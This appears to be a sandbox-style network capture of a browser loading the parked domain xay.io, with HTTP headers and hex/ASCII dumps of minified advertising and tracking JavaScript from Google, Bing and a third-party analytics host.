2025-01-12 00:33:19 UTC	15877	IN	Data Raw: 31 61 30 36 37 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 69 66 28 6e 5b 65 5d 29 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 6e 5b 65 5d 3d 7b 69 3a 65 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 65 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 72 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 72 2e 6d 3d 74 2c 72 2e 63 3d 6e 2c 72 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 65 29 7b 72 2e 6f 28 74 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 65 7d 29 7d 2c Data Ascii: 1a067!function(t){var n={};function r(e){if(n[e])return n[e].exports;var i=n[e]={i:e,l:!1,exports:{}};return t[e].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=n,r.d=function(t,n,e){r.o(t,n)\|\|Object.defineProperty(t,n,{enumerable:!0,get:e})},
2025-01-12 00:33:19 UTC	16384	IN	Data Raw: 22 5f 66 62 70 22 29 3b 69 66 28 74 29 7b 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 3e 3d 33 29 72 65 74 75 72 6e 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 33 5d 2b 22 2e 22 2b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 32 5d 2b 22 2e 22 2b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 7d 72 65 74 75 72 6e 22 2d 22 7d 2c 48 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 41 2e 51 74 28 22 5f 66 62 63 22 29 3b 69 66 28 74 29 7b 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 2e 22 29 3b 69 66 28 6e 2e 6c 65 6e 67 74 68 3e 3d 33 29 72 65 74 75 72 6e 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 33 5d 2b 22 2e 22 2b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 32 5d 2b 22 2e 22 2b 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 7d 72 65 74 75 72 6e 22 2d 22 Data Ascii: "_fbp");if(t){var n=t.split(".");if(n.length>=3)return n[n.length-3]+"."+n[n.length-2]+"."+n[n.length-1]}return"-"},Hn:function(){var t=A.Qt("_fbc");if(t){var n=t.split(".");if(n.length>=3)return n[n.length-3]+"."+n[n.length-2]+"."+n[n.length-1]}return"-"
2025-01-12 00:33:19 UTC	16384	IN	Data Raw: 28 29 2c 64 3d 5f 2e 5f 6e 28 79 2e 43 72 28 29 29 2c 68 3d 5f 2e 79 6e 28 29 2c 67 3d 75 28 29 2c 62 3d 6f 2e 70 65 28 29 3b 74 3d 2b 6e 65 77 20 44 61 74 65 3b 76 61 72 20 45 3d 76 2e 67 65 74 53 70 61 50 61 67 65 28 29 2c 78 3d 79 2e 6e 72 28 7b 69 64 3a 6b 2e 69 64 2c 75 72 6c 3a 79 2e 4a 6e 28 72 2c 6b 2e 69 64 2c 4e 2c 6b 2e 47 72 29 2c 73 66 3a 2b 79 2e 62 72 28 29 2c 74 70 69 3a 4e 2e 74 70 69 2c 63 68 3a 4e 2e 63 68 2c 75 76 69 64 3a 4e 2e 75 76 69 64 2c 74 73 66 3a 65 2c 74 73 66 6d 69 3a 69 2c 74 73 66 75 3a 61 2c 63 62 3a 74 2c 68 6c 3a 79 2e 61 72 28 29 2c 6f 70 3a 2b 79 2e 69 72 28 29 2c 61 67 3a 70 2e 5a 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 2c 72 61 6e 64 3a 6e 2c 66 73 3a 6c 2e 77 2b 22 78 22 2b 6c 2e 68 2c 66 73 Data Ascii: (),d=_._n(y.Cr()),h=_.yn(),g=u(),b=o.pe();t=+new Date;var E=v.getSpaPage(),x=y.nr({id:k.id,url:y.Jn(r,k.id,N,k.Gr),sf:+y.br(),tpi:N.tpi,ch:N.ch,uvid:N.uvid,tsf:e,tsfmi:i,tsfu:a,cb:t,hl:y.ar(),op:+y.ir(),ag:p.Z(navigator.userAgent),rand:n,fs:l.w+"x"+l.h,fs
2025-01-12 00:33:20 UTC	16384	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 21 3d 3d 6e 26 26 75 5b 74 5d 3d 3d 3d 75 5b 6e 5d 7d 29 7d 76 61 72 20 72 3d 6e 28 22 41 72 72 61 79 22 29 3b 69 66 28 2d 31 21 3d 3d 72 29 7b 76 61 72 20 65 3d 5b 72 2c 6e 28 22 53 79 6d 62 6f 6c 22 29 2c 6e 28 22 50 72 6f 6d 69 73 65 22 29 5d 3b 69 66 28 63 2e 46 74 28 65 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 2d 31 21 3d 3d 74 7d 29 26 26 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 7c 7c 30 3d 3d 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 74 5b 30 5d 2c 72 3d 74 5b 30 5d 2c 65 3d 31 3b 65 3c 74 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 65 5d 3c 6e 26 26 28 6e 3d 74 5b 65 5d 29 2c 74 5b 65 5d 3e 72 26 26 28 72 3d 74 5b 65 5d 29 Data Ascii: unction(t){return t!==n&&u[t]===u[n]})}var r=n("Array");if(-1!==r){var e=[r,n("Symbol"),n("Promise")];if(c.Ft(e,function(t){return-1!==t})&&function(t){if(!t\|\|0===t.length)return!1;for(var n=t[0],r=t[0],e=1;e<t.length;e++)t[e]<n&&(n=t[e]),t[e]>r&&(r=t[e])
2025-01-12 00:33:20 UTC	16384	IN	Data Raw: 76 61 72 20 74 3d 75 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 42 79 54 79 70 65 28 22 66 69 72 73 74 2d 69 6e 70 75 74 22 29 3b 69 66 28 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 6e 3d 5b 22 31 22 2c 28 74 3d 74 5b 30 5d 29 2e 6e 61 6d 65 2c 70 61 72 73 65 49 6e 74 28 74 2e 73 74 61 72 74 54 69 6d 65 29 5d 2c 72 3d 74 2e 74 61 72 67 65 74 26 26 61 2e 42 74 28 74 2e 74 61 72 67 65 74 29 3b 69 66 28 72 29 7b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6e 2e 70 75 73 68 28 65 2e 74 61 67 4e 61 6d 65 29 2c 6e 2e 70 75 73 68 28 72 2e 78 29 2c 6e 2e 70 75 73 68 28 72 2e 79 29 2c 6e 2e 70 75 73 68 28 65 2e 69 64 29 2c 6e 2e 70 75 73 68 28 65 2e 63 6c 61 73 73 4e 61 6d 65 29 7d 72 65 74 75 72 6e 20 6e 2e 6a 6f 69 6e 28 22 2c 22 29 7d Data Ascii: var t=u.performance.getEntriesByType("first-input");if(t.length){var n=["1",(t=t[0]).name,parseInt(t.startTime)],r=t.target&&a.Bt(t.target);if(r){var e=t.target;n.push(e.tagName),n.push(r.x),n.push(r.y),n.push(e.id),n.push(e.className)}return n.join(",")}
2025-01-12 00:33:20 UTC	16384	IN	Data Raw: 26 28 72 3d 21 30 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 72 29 6d 2e 5a 65 2e 70 75 73 68 28 7b 73 3a 31 7d 29 3b 65 6c 73 65 7b 76 61 72 20 69 3d 30 3b 73 77 69 74 63 68 28 6f 2e 7a 74 28 29 29 7b 63 61 73 65 22 76 69 73 69 62 6c 65 22 3a 69 3d 31 3b 62 72 65 61 6b 3b 63 61 73 65 22 68 69 64 64 65 6e 22 3a 69 3d 32 3b 62 72 65 61 6b 3b 63 61 73 65 22 70 72 65 72 65 6e 64 65 72 22 3a 69 3d 33 7d 6d 2e 5a 65 2e 70 75 73 68 28 7b 73 3a 69 7d 29 7d 6f 2e 62 6e 28 76 2c 22 66 6f 63 75 73 22 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6f 2e 6d 6e 28 74 29 3b 67 28 72 29 2c 6d 2e 5a 65 2e 70 75 73 68 28 7b 73 3a 34 2c 74 3a 72 7d 29 7d 29 2c 6f 2e 62 6e 28 76 2c 22 62 6c 75 72 22 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 6f 2e Data Ascii: &(r=!0)}catch(t){}if(r)m.Ze.push({s:1});else{var i=0;switch(o.zt()){case"visible":i=1;break;case"hidden":i=2;break;case"prerender":i=3}m.Ze.push({s:i})}o.bn(v,"focus",function(n){var r=o.mn(t);g(r),m.Ze.push({s:4,t:r})}),o.bn(v,"blur",function(n){var r=o.
2025-01-12 00:33:20 UTC	8816	IN	Data Raw: 5b 61 5d 2e 70 75 73 68 28 22 70 61 67 65 4c 6f 61 64 22 29 7d 2c 28 6f 3d 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 29 2e 73 72 63 3d 22 2f 2f 62 61 74 2e 62 69 6e 67 2e 63 6f 6d 2f 62 61 74 2e 6a 73 22 2c 6f 2e 61 73 79 6e 63 3d 31 2c 6f 2e 6f 6e 6c 6f 61 64 3d 6f 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 72 65 61 64 79 53 74 61 74 65 3b 74 26 26 22 6c 6f 61 64 65 64 22 21 3d 3d 74 26 26 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 74 7c 7c 28 63 28 29 2c 6f 2e 6f 6e 6c 6f 61 64 3d 6f 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 3d 6e 75 6c 6c 29 7d 2c 28 75 3d 72 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 5b 30 5d 29 2e 70 Data Ascii: [a].push("pageLoad")},(o=r.createElement(e)).src="//bat.bing.com/bat.js",o.async=1,o.onload=o.onreadystatechange=function(){var t=this.readyState;t&&"loaded"!==t&&"complete"!==t\|\|(c(),o.onload=o.onreadystatechange=null)},(u=r.getElementsByTagName(e)[0]).p

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:19 UTC	418	OUT	GET /adsense/domains/caf.js?abp=1&adsdeli=true HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: http://www.xay.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:20 UTC	718	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding Content-Type: text/javascript; charset=UTF-8 Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui" Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]} Content-Length: 147117 Date: Sun, 12 Jan 2025 00:33:20 GMT Expires: Sun, 12 Jan 2025 00:33:20 GMT Cache-Control: private, max-age=3600 ETag: "10461846987009007301" X-Content-Type-Options: nosniff Link: <https://syndicatedsearch.goog>; rel="preconnect" Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-12 00:33:20 UTC	672	IN	Data Raw: 69 66 28 21 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 29 7b 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 3d 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 41 6c 74 4c 6f 61 64 65 72 3d 33 3b 76 61 72 20 73 66 66 65 44 61 74 61 5f 3d 7b 73 65 72 76 69 63 65 5f 68 6f 73 74 3a 22 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 68 61 73 68 3a 22 35 39 34 32 35 39 39 38 31 32 32 37 30 35 36 32 37 32 35 22 2c 70 61 63 6b 61 67 65 73 3a 22 64 6f 6d 61 69 6e 73 22 2c 6d 6f 64 75 6c 65 3a 22 61 64 73 22 2c 76 65 72 73 69 6f 6e 3a 22 31 22 2c 6d 3a 7b 63 65 69 3a 22 31 37 33 30 30 30 30 33 2c 31 37 33 30 31 34 33 37 2c 31 37 33 30 Data Ascii: if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"5942599812270562725",packages:"domains",module:"ads",version:"1",m:{cei:"17300003,17301437,1730
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 31 38 30 30 30 30 30 2c 73 73 64 6c 3a 22 59 58 42 77 63 33 42 76 64 43 35 6a 62 32 30 73 59 6d 78 76 5a 33 4e 77 62 33 51 75 59 32 39 74 4c 47 4a 79 4c 6d 4e 76 62 53 78 6a 62 79 35 6a 62 32 30 73 59 32 78 76 64 57 52 6d 63 6d 39 75 64 43 35 75 5a 58 51 73 5a 58 55 75 59 32 39 74 4c 47 68 76 63 48 52 76 4c 6d 39 79 5a 79 78 70 62 69 35 75 5a 58 51 73 64 48 4a 68 62 6e 4e 73 59 58 52 6c 4c 6d 64 76 62 32 63 73 64 57 73 75 59 32 39 74 4c 48 56 7a 4c 6d 4e 76 62 53 78 33 5a 57 49 75 59 58 42 77 22 2c 63 64 6c 3a 66 61 6c 73 65 2c 63 64 68 3a 22 73 79 6e 64 69 63 61 74 65 64 73 65 61 72 63 68 2e 67 6f 6f 67 22 2c 63 64 65 6d 3a 7b 22 61 66 73 5f 61 61 5f 62 61 73 65 6c 69 6e 65 22 3a 35 30 30 2c 22 61 66 73 5f 63 68 61 74 62 6f 74 22 3a 30 2c 22 61 66 73 5f Data Ascii: 1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog",cdem:{"afs_aa_baseline":500,"afs_chatbot":0,"afs_
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 7d 3b 76 61 72 20 64 3d 22 6a 73 63 6f 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 45 39 3e 3e 3e 30 29 2b 22 5f 22 2c 65 3d 30 3b 72 65 74 75 72 6e 20 62 7d 29 3b 0a 72 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 61 3d 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 Data Ascii: };var d="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",e=0;return b});r("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Arr
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 65 72 61 62 6c 65 20 6f 72 20 41 72 72 61 79 4c 69 6b 65 22 29 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 6f 61 28 61 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 29 7b 61 3d 75 28 61 29 3b 66 6f 72 28 76 61 72 20 62 2c 63 3d 5b 5d 3b 21 28 62 3d 61 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 63 2e 70 75 73 68 28 62 2e 76 61 6c 75 65 29 3b 61 3d 63 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 71 61 28 61 2c 61 29 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 61 2c 62 29 7b 61 2e 72 61 77 3d 62 3b 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 26 26 28 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 61 29 2c 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 62 29 29 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 Data Ascii: erable or ArrayLike");}function oa(a){if(!(a instanceof Array)){a=u(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}function pa(a){return qa(a,a)}function qa(a,b){a.raw=b;Object.freeze&&(Object.freeze(a),Object.freeze(b));return a}func
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 73 2e 44 64 28 68 29 7d 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 67 3d 76 6f 69 64 20 30 3b 74 72 79 7b 67 3d 68 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 55 63 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 67 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 45 66 28 67 2c 68 29 3a 74 68 69 73 2e 44 64 28 68 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 55 63 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 55 64 28 32 2c 68 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 44 64 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 55 64 28 31 2c 68 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 55 64 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 69 66 28 74 68 69 73 2e Data Ascii: s.Dd(h)}};b.prototype.yf=function(h){var g=void 0;try{g=h.then}catch(k){this.Uc(k);return}typeof g=="function"?this.Ef(g,h):this.Dd(h)};b.prototype.Uc=function(h){this.Ud(2,h)};b.prototype.Dd=function(h){this.Ud(1,h)};b.prototype.Ud=function(h,g){if(this.
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 2c 6d 29 29 3b 72 65 74 75 72 6e 20 6e 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 63 61 74 63 68 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 68 65 6e 28 76 6f 69 64 20 30 2c 68 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 65 62 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 0a 67 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 73 77 69 74 63 68 28 6c 2e 41 29 7b 63 61 73 65 20 31 3a 68 28 6c 2e 53 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 67 28 6c 2e 53 61 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 3a 20 22 2b 6c 2e 41 29 3b 7d 7d 76 61 72 20 6c 3d 74 68 69 73 3b 74 68 69 73 2e 74 61 3d 3d 6e 75 6c 6c 3f 66 2e 70 64 28 6b 29 3a 74 68 69 73 Data Ascii: ,m));return n};b.prototype.catch=function(h){return this.then(void 0,h)};b.prototype.eb=function(h,g){function k(){switch(l.A){case 1:h(l.Sa);break;case 2:g(l.Sa);break;default:throw Error("Unexpected state: "+l.A);}}var l=this;this.ta==null?f.pd(k):this
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 6c 75 65 3a 6c 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 6b 29 7b 76 61 72 20 6c 3d 4f 62 6a 65 63 74 5b 6b 5d 3b 6c 26 26 28 4f 62 6a 65 63 74 5b 6b 5d 3d 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 69 66 28 6d 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 29 72 65 74 75 72 6e 20 6d 3b 4f 62 6a 65 63 74 2e 69 73 45 78 74 65 6e 73 69 62 6c 65 28 6d 29 26 26 65 28 6d 29 3b 72 65 74 75 72 6e 20 6c 28 6d 29 7d 29 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 21 4f 62 6a 65 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 6b 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6c 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 0a 6d 3d 6e 65 77 20 61 28 5b 5b 6b 2c 32 5d 2c 5b 6c 2c 33 5d 5d 29 3b 69 66 28 6d 2e 67 65 74 28 Data Ascii: lue:l})}}function f(k){var l=Object[k];l&&(Object[k]=function(m){if(m instanceof c)return m;Object.isExtensible(m)&&e(m);return l(m)})}if(function(){if(!a\|\|!Object.seal)return!1;try{var k=Object.seal({}),l=Object.seal({}),m=new a([[k,2],[l,3]]);if(m.get(
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 75 6e 63 74 69 6f 6e 20 65 28 67 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 3b 69 66 28 67 29 7b 67 3d 75 28 67 29 3b 66 6f 72 28 76 61 72 20 6b 3b 21 28 6b 3d 67 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6b 3d 6b 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6b 5b 30 5d 2c 6b 5b 31 5d 29 7d 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 67 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 Data Ascii: unction e(g){this[0]={};this[1]=b();this.size=0;if(g){g=u(g);for(var k;!(k=g.next()).done;)k=k.value,this.set(k[0],k[1])}}if(function(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var g=Object.seal({x:4})
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 2c 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 67 2e 76 61 6c 75 65 7d 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 66 6f 72 45 61 63 68 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 6b 29 7b 66 6f 72 28 76 61 72 20 6c 3d 74 68 69 73 2e 65 6e 74 72 69 65 73 28 29 2c 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 0a 6d 2e 76 61 6c 75 65 2c 67 2e 63 61 6c 6c 28 6b 2c 6d 5b 31 5d 2c 6d 5b 30 5d 2c 74 68 69 73 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3b 76 61 72 20 68 3d 30 3b 72 65 74 75 72 6e 20 65 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 76 61 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 Data Ascii: ,function(g){return g.value})};e.prototype.forEach=function(g,k){for(var l=this.entries(),m;!(m=l.next()).done;)m=m.value,g.call(k,m[1],m[0],this)};e.prototype[Symbol.iterator]=e.prototype.entries;var h=0;return e});function va(a,b){a instanceof String&&
2025-01-12 00:33:20 UTC	1390	IN	Data Raw: 6f 74 79 70 65 2e 66 69 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 68 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 68 2c 66 2c 64 29 29 7b 62 3d 68 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 72 28 22 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d Data Ascii: otype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var h=d[f];if(b.call(c,h,f,d)){b=h;break a}}b=void 0}return b}});r("Object.entries",function(a){return a?a:function(b){var c=

Timestamp	Bytes transferred	Direction	Data
2025-01-12 00:33:20 UTC	388	OUT	GET /sxp/i/c4601e5f6cdd73216cafdd5af209201c.js HTTP/1.1 Host: euob.netgreencolumn.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-12 00:33:21 UTC	507	IN	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Server: Caddy Date: Sat, 11 Jan 2025 23:43:54 GMT Cache-Control: max-age=43200 Expires: Sun, 12 Jan 2025 11:29:20 GMT ETag: "1a067-h47LxtAMTVpkm/jIU9A3aGADhWY" Vary: Accept-Encoding X-Cache: Hit from cloudfront Via: 1.1 10f3c0984ab3eaba3e5720ed830a77b6.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA56-P4 X-Amz-Cf-Id: bUVExKHsmux1ontqitihdBAR-OtE4t_rn12SjgNmf1QsSEvihZQwFA== Age: 3840
